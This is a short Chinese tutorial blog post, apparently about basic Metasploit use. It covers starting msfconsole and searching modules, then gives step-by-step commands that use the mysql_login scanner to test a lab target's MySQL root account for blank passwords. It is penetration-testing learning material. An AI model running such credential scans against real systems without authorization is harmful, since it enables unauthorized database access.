4.Metasploit 基本使用方法

1.打開Metasploit?

systemctl start postgresql

systemctl enable postgresql? ? ?##搞成開機啟動

msfconsole? ? ###進(jìn)入控制臺


這玩意每次打開顯示的圖片都是不一樣的? 很有趣

connect 命令主要用于遠(yuǎn)程連接主機

試下看? connected 就是連接成功

輸入get 會發(fā)出一個請求? 可以看到web相關(guān)信息

search mysql? ? ##search 是查詢命令

search name:mysql? ? ? ? ? ? ? ? ?#要查找 mysql 數(shù)據(jù)庫的漏洞

search platform:mysql? ? ? ? ? ? ? #查詢平臺里包含mysql信息的模塊

search type:exploit? ? ? ? ? ? ? ? ?##還可以通過類型查找

search name:mysql type:exploit? ? ? ##聯(lián)合查詢



攻擊步驟

1.先search 查詢? ?

2.然后show options

3.set 參數(shù)??

4.run 開始攻擊

5.back退出

下面用下msf掃描一下靶機上的mysql上面的空密碼

靶機的地址是192.168.80130? 搞之前先ping一下子


首先搜索一下掃描mysql密碼的模塊

search mysql_login

就一個? ?auxiliary/scanner/mysql/mysql_login


加載模塊? use auxiliary/scanner/mysql/mysql_login


看模塊參數(shù)? ? ? show options


那個RHOSTS就是被攻擊的ip地址

set USERNAME root


set BLANK_PASSWORDS true

開啟為所有用戶嘗試空密碼

set RHOSTS 192.168.80.130

然后開搞


最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容